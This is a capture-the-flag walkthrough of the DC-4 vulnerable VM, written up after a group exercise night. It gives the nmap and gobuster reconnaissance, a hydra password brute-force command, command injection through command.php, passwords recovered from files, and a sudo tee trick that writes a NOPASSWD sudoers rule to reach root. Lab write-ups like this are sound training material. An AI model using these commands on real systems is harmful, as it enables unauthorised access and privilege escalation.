DC919 CTF exercise night using "DC-4" prebuilt VM image
SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.
The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out of it smarter.
In this case the VMs have the following IPs:
nmap -A -sS -p- 192.168.57.7
nmap scan shows:
http://192.168.57.7/ in a browser shows simple web form, username/password/submit.
gobuster w//usr/share/dirb/wordlists/common.txt shows minimal: /css/ and /images/
someone else found command.php (wordlist? idk) which offers a few options
Can't find a valid entry point with sqlmap, so a fallback option: guessing a username and attempting to brute force the password:
hydra -v -l admin -P /usr/share/wordlists/rockyou.txt 192.168.57.7 http-form-post "/login.php:username=^USER^&password=^PASS^&submit=Submit:S=command.php"
Using that and firefox webtools to copy-as-curl, can use command.php for arbitrary command execution: radio=arbitrarycommand
Found in /home/jim/backups/old-passwords.bak
Found password: jim/jibril04
/home/jim/mbox is a hint that jim reads mail here, and /var/mail/jim contains a password: Found password: charles/xHhA&hvim0y
charles is able to "sudo /usr/bin/teehee"
easy pivot:
echo "charles ALL = NOPASSWD: ALL" >nopasswd.txt sudo /usr/bin/teehee /etc/sudoers.d/charles <nopasswd.txt
sudo -i
cat /root/flag.txt